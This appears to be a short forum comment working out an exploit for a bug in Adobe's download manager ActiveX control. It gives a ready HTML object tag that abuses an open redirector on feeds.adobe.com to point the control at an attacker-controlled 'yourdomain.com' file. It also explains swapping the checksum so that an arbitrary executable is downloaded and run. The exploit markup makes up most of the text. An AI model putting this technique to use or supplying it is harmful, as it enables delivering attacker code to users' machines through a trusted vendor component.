The second screenshot on the register article makes  the bug guessable. The control must whitelist *.adobe.com, then he uses the obvious open redirector on feeds.adobe.com to 302 to his exploit.

looking at the download page and you just need a page that has this (didnt test)

<object id="GetActiveX" classid="clsid:E2883E8F-472F-4fb0-9522-AC9BF37916A7"

                    codebase="http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab#Version=1,6,2,45"
                    type="application/x-oleobject" width="1" height="1">
                <param name="Service-URL" value="http://feeds.adobe.com/controller.cfm?handler=PostHandler&action=click&postId=123&nextPage=http://yourdomain.com/file.txt" />
                <param name="itemid" value="calc" />
                <param name="core-product" value="calc" />
                <param name="dlmbanner" value="off" />
                <param name="language" value="" />
                <param name="os" value="" />
            </object>

Where file.txt is formatted like this http://get.adobe.com/reader/webservices/dlm/?itemid=Reader_9.3_English_UK_for_Windows

Checksum is just the MD5 of that exe, so you can just replace it. You need to click the security bar and agree you want it to run, and it's only installed transiently. I guess I agree with Adobe: not the end of the world. Any user who will clicky that will agree to the "install control" warning as well and already has bonzibuddy.ocx